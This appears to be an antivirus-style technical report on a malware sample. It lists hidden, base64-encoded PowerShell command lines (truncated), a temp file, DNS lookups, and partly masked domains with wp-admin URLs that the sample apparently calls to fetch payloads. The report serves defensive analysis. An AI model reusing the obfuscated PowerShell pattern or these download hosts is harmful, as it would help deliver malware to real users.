Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGsAdwBBAEcAawA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAegBfACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAF8AQQAnACwAJwBDAFgAQQAnACkAKQA7ACQAdgBHAFEAQQBVAEEAQgA0ACAAPQAgACcAMQAyACcAOwAkAFQAU...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1199881.cvr
- 'ek###minki.pl':80
- 'gk##x.net':80
- 'ip##z.pt':80
- http://gk##x.net/wp-admin/y_v/
- http://www.ip##z.pt/wp-admin/W_D/
- http://ip##z.pt/wp-admin/W_D/
- DNS ASK ek###minki.pl
- DNS ASK gi###phan.vn
- DNS ASK gk##x.net
- DNS ASK do###tes.club
- DNS ASK ip##z.pt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGsAdwBBAEcAawA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAegBfACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAF8AQQAnACwAJwBDAFgAQQAnACkAKQA7ACQAdgBHAFEAQQBVAEEAQgA0ACAAPQAgACcAMQAyACcAOwAkAFQAU...' (with hidden window)